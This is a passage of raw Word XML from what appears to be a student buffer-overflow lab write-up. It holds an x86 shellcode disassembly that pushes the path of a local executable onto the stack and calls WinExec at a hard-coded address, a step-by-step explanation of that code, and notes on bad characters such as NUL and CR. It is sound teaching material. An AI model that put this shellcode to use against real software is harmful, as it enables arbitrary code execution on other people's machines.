        <w:tab/>
        <w:t>PUSH 72657355</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F322BD" w14:textId="5F165FE7"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00401043      68 22433A5C   </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>PUSH 5C3A4322</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A888AEB" w14:textId="1918645C"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00401048      89E3          </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">MOV </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EBX,ESP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1346468B" w14:textId="37D42F53"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0040104A      40            </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>INC EAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0D0EED" w14:textId="429281CA"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0040104B      50            </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>PUSH EAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32025811" w14:textId="0CFCEFA0"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0040104C      53            </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>PUSH EBX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF93FF9" w14:textId="5E8180C0"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0040104D      B8 8039AD76   </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>MOV EAX,76AD3980</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F855CB3" w14:textId="76E70B91" w:rsidR="00436173" w:rsidRPr="00BE1A6B" w:rsidRDefault="00815B7A" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">00401052      FFD0          </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>CALL EAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191C518D" w14:textId="6E713B2D" w:rsidR="00485EE5" w:rsidRPr="00BE1A6B" w:rsidRDefault="00485EE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22851C3D" w14:textId="77777777"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This assembly code is designed to call the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function with a specific path to an executable file as its argument. I will break down the code step by step:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67990DE6" w14:textId="77777777" w:rsidR="00815B7A" w:rsidRPr="00BE1A6B" w:rsidRDefault="00815B7A" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75B7242B" w14:textId="77777777"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ADD </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ESP,-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>80: Adjust the stack pointer by subtracting 80. This reserves some stack space for local variables or other uses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF369E1" w14:textId="77777777" w:rsidR="00815B7A" w:rsidRPr="00BE1A6B" w:rsidRDefault="00815B7A" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E3191B6" w14:textId="77777777"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XOR </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EAX,EAX</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Clear the EAX register (set it to 0).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAFDD10" w14:textId="77777777" w:rsidR="00815B7A" w:rsidRPr="00BE1A6B" w:rsidRDefault="00815B7A" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BC0A8E0" w14:textId="04792B47"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PUSH EAX: Push the value 0 onto the stack. This will be the second argument for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function call, which corresponds to a hidden window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491B48BB" w14:textId="77777777" w:rsidR="00815B7A" w:rsidRPr="00BE1A6B" w:rsidRDefault="00815B7A" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F82CF4" w14:textId="377DF6F2" w:rsidR="00485EE5" w:rsidRPr="00BE1A6B" w:rsidRDefault="00815B7A" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The following series of PUSH instructions push the path of the executable file onto the stack, in reverse order. The path is split into DWORD-sized chunks which are pushed onto the stack one by one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7208D0B4" w14:textId="573B7D61" w:rsidR="00815B7A" w:rsidRPr="00BE1A6B" w:rsidRDefault="00815B7A" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38191CCF" w14:textId="4939EAF5" w:rsidR="00815B7A" w:rsidRPr="00BE1A6B" w:rsidRDefault="00815B7A" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>These instructions push the string: "C:\Users\student\Desktop\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BufferOverflow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">\wlck.exe". </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36730C8A" w14:textId="77777777" w:rsidR="00815B7A" w:rsidRPr="00BE1A6B" w:rsidRDefault="00815B7A" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B4CDB7" w14:textId="11886D50" w:rsidR="00815B7A" w:rsidRPr="00BE1A6B" w:rsidRDefault="00815B7A" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MOV EBX, ESP: Move the current stack pointer value into the EBX register.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1144DF8B" w14:textId="77777777" w:rsidR="00815B7A" w:rsidRPr="00BE1A6B" w:rsidRDefault="00815B7A" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A4086EE" w14:textId="77777777" w:rsidR="00815B7A" w:rsidRPr="00BE1A6B" w:rsidRDefault="00815B7A" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INC EAX: Increment the EAX register (set it to 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38850B1D" w14:textId="77777777" w:rsidR="00815B7A" w:rsidRPr="00BE1A6B" w:rsidRDefault="00815B7A" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63082948" w14:textId="2BDAD063"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PUSH EAX: Push the value 1 onto the stack. This will be the second argument for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function call, which corresponds to a normal window without focus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B248F84" w14:textId="77777777" w:rsidR="00815B7A" w:rsidRPr="00BE1A6B" w:rsidRDefault="00815B7A" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54A2850E" w14:textId="4DF785F4"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PUSH EBX: Push the address of the path string onto the stack. This will be the first argument for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D75C93" w14:textId="77777777" w:rsidR="00815B7A" w:rsidRPr="00BE1A6B" w:rsidRDefault="00815B7A" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56076238" w14:textId="77777777"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MOV EAX,76AD3980: Load the address of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function into the EAX register. Note that this address may be different on different systems or runs, so it needs to be updated dynamically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744FF10E" w14:textId="77777777" w:rsidR="00815B7A" w:rsidRPr="00BE1A6B" w:rsidRDefault="00815B7A" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39DFA9D0" w14:textId="77777777" w:rsidR="00815B7A" w:rsidRPr="00BE1A6B" w:rsidRDefault="00815B7A" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CALL EAX: Call the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function using the address stored in the EAX register.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548250A0" w14:textId="77777777" w:rsidR="00815B7A" w:rsidRPr="00BE1A6B" w:rsidRDefault="00815B7A" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2045D2F9" w14:textId="6369DF9A" w:rsidR="00815B7A" w:rsidRDefault="00815B7A" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In summary, this assembly code calls the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE1A6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function with a hard-coded path to an executable file as its argument and a normal window without focus as the window style.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB4120D" w14:textId="77777777" w:rsidR="00BE1A6B" w:rsidRDefault="00BE1A6B" w:rsidP="00815B7A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="443C0E09" w14:textId="79342496" w:rsidR="00BE1A6B" w:rsidRDefault="00BE1A6B" w:rsidP="00BE1A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF510C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>There are several characters that are considered "impossible" because they cannot be easily printed or displayed on a screen. Some of these characters include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606C8CF8" w14:textId="3F68F750" w:rsidR="00F649F8" w:rsidRDefault="00F649F8" w:rsidP="00BE1A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B10C71" w14:textId="77777777" w:rsidR="00F649F8" w:rsidRPr="00F649F8" w:rsidRDefault="00F649F8" w:rsidP="00F649F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F649F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Carriage Return (CR): This character moves the cursor to the beginning of a line of text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143718D4" w14:textId="77777777" w:rsidR="00F649F8" w:rsidRPr="00F649F8" w:rsidRDefault="00F649F8" w:rsidP="00F649F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F649F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Line Feed (LF): This character moves the cursor to the next line of text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C04553" w14:textId="77777777" w:rsidR="00F649F8" w:rsidRPr="00F649F8" w:rsidRDefault="00F649F8" w:rsidP="00F649F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F649F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tab (TAB): This character moves the cursor to the next tab stop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B303F7F" w14:textId="719ED89C" w:rsidR="00F649F8" w:rsidRDefault="00F649F8" w:rsidP="00F649F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F649F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Backspace (BS): This character moves the cursor one position to the left and erases the character there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E8D92C" w14:textId="77777777" w:rsidR="008175DE" w:rsidRPr="00F649F8" w:rsidRDefault="008175DE" w:rsidP="00F649F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5500A368" w14:textId="77777777" w:rsidR="00F649F8" w:rsidRPr="00F649F8" w:rsidRDefault="00F649F8" w:rsidP="00F649F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F649F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Escape (ESC): This character signals the start of an escape sequence that can be used to change text color or other formatting options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1489B66F" w14:textId="77777777" w:rsidR="00F649F8" w:rsidRPr="00F649F8" w:rsidRDefault="00F649F8" w:rsidP="00F649F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F649F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Null (NUL): This character has no visual representation and is used to terminate strings or data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E47D26" w14:textId="6276E4C4" w:rsidR="00F649F8" w:rsidRDefault="00F649F8" w:rsidP="00F649F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F649F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>These characters are often represented in text files using special escape sequences, such as \r for carriage return and \n for line feed, to make them visible and distinguish them from printable characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06331AFC" w14:textId="77777777" w:rsidR="008175DE" w:rsidRDefault="008175DE" w:rsidP="00F649F8">
      <w:pPr>
        <w:rPr>
